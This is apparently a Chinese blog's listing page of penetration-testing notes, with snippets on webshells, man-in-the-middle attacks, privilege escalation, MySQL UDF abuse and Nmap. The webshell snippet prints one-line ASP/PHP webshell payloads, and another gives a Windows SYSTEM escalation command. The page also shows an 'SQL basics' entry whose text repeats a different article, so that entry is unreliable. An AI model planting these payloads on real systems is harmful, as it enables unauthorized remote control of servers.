笔记
文章平均质量分 57
「已注销」
这个作者很懒,什么都没留下…
展开
-
行业术语(道德黑客)
Footprinting 踩点 Dos 拒绝服务攻击 DDos FUD 免杀 RAT 远程管理工具 Fishing 钓鱼攻击 SQL 注入 VPN Proxy 代理 Tor 中继代理 VPS ...转载 2018-03-07 23:37:32 · 214 阅读 · 0 评论 -
SSL,TLS中间人攻击
概念通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。攻击者位于通信链路中ARP地址欺骗 DHCP 修改网关 修改DNS 修改HOSTS ICMP协议,STP协议,OSPF路由协议攻击前提客户端已经信任伪造证书 攻击者控制了核发证书颁发机构 客户端程序禁止了显示证书错误警告信息 攻击者已控制客户端,强制信任伪造证书解密中间人流量的工具...原创 2018-07-28 12:01:33 · 3420 阅读 · 1 评论 -
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)
本质 : windows平台中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀使用方法:往目标web服务器上传相应的一句话木马 asp一句话木马:<%execute(request("pass"))%>php一句话木马:<?php @eval($_POS原创 2018-07-27 12:19:55 · 26451 阅读 · 0 评论 -
for循环嵌套优化
最近生成密码字典的时候遇到了多层for循环嵌套的问题,如下for (int i = 0; i < 1000; i++) for (int j = 0; j < 100; j++) for (int k = 0; k < 10; k++) testFunction (i, j, k); 原代码耗时分析循环...转载 2018-07-17 10:34:55 · 5066 阅读 · 0 评论 -
无线渗透-基础理论知识
无线协议标准IEEE 802.11标准标准涉及数据链路层 逻辑链路控制子层LLC媒体访问控制子层MAC物理层无线射频信号编码DSSS 直序扩频FHSS 跳频扩频媒体访问方式—CSMA/CA根据算法侦听一定时长发送数据前发包声明无线网络运行模式Infrastructure 至少包含一个AP,一个STATION,形成BSS...原创 2018-07-16 21:26:10 · 595 阅读 · 0 评论 -
web常见漏洞基础原理
概念跨站脚本 盗取用户信息,钓鱼,制造蠕虫等存储型访问网站时触发,xss脚本存储在web服务器上反射型访问携带xss脚本链接时触发,在url上执行脚本DOM型访问携带xss脚本链接时触发,脚本通过JavaScript写入hash三种类型区分...原创 2018-07-09 17:07:50 · 2230 阅读 · 0 评论 -
SQL基础语句
无线协议标准IEEE 802.11标准标准涉及数据链路层 逻辑链路控制子层LLC媒体访问控制子层MAC物理层无线射频信号编码DSSS 直序扩频FHSS 跳频扩频媒体访问方式—CSMA/CA根据算法侦听一定时长发送数据前发包声明无线网络运行模式Infrastructure 至少包含一个AP,一个STATION,形成BS...原创 2018-07-08 12:31:20 · 198 阅读 · 0 评论 -
Macchanger-更改mac地址
MAC地址 物理地址、硬件地址 定义网络设备的位置 在OSI模型中,第二层数据链路层则负责 MAC地址 MAC地址是网卡决定的,是固定的。 ifconfig eth0# HWaddr即为MAC地址,前三项是 `设备制造商` 信息MAC地址在同一内网中是可见的macchanger —– 修改mac地址的工具 只能修改让别人看见的mac地址...原创 2018-05-29 18:19:11 · 5489 阅读 · 0 评论 -
Kali实战-提权
本地提权windows默认账号user Administrator System #最高权限 关系图示: Linux默认账号User RootADMIN提权为SYSTEM 思路:利用windows中以system运行的程序进行操作,将系统提权win xp、win2003at 18:12(时间) /interactive cmd ...原创 2018-05-28 20:59:59 · 4620 阅读 · 0 评论 -
漏洞扫描-Nmap脚本
以smb-vuln-ms10-061.nse为例smb-vuln-ms10-061.nse(Stuxnet蠕虫利用的4个漏洞之一)-Print Spooler权限不当,打印请求可在系统目录创建文件,执行任意代码利用方法: nmap -p445 –script=smb-vuln-ms10-061.nse+ipNmap脚本存放路径: cd /usr/sha...原创 2018-05-13 19:06:49 · 3435 阅读 · 0 评论 -
漏洞基本概念
cvss通用漏洞评分系统cve统一的漏洞编号标准oval开放漏洞描述语言cce描述软件配置缺陷的一种标准化格式cpe结构化命名规范cwe描述不同类型漏洞的特征SCAP安全标准框架NVD美国国家漏洞库 https://nvd.nist.gov/漏洞管理三要素 准确性 时间 资源...原创 2018-05-13 18:31:04 · 2008 阅读 · 0 评论 -
Nmap 所有参数
目标说明-iL 从已有的ip列表文件中读取并扫描-iR+扫描数量 随机选择目标进行扫描--exclude+ip 不扫描此ip主机发现-sL 列出要扫描的ip-sn 不进行端口扫描-Pn 将所有主机都默认为在线,跳过主机发现-PS/PA/PU/PY 使用TCP、SYN/ACK、UDP或SCTP协议去发现端口-PE/PP/PM:使用I...翻译 2018-05-11 18:12:20 · 16116 阅读 · 0 评论 -
kali 渗透测试-第7章 主动信息收集
发现-潜在的被攻击目标二层发现-arp 进入局域网后,在跳板上扫描局域网内其他目标 探测ip地址是否存活arping nmap netdiscover scapy三层发现-ip,icmp 可路由,常被防火墙过滤,速度比二层发现稍慢 探测ip地址是否存活ping traceroute 可追踪数据包经过的路由器ping -r 192...原创 2018-05-05 10:13:25 · 598 阅读 · 0 评论 -
MySQL UDF提权
0x00 原理udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。 0x01 思路 1. 将udf文件上传到指定位置 sqlmap中有现成的udf文件,分为32位和64位...原创 2018-08-08 22:21:07 · 9140 阅读 · 0 评论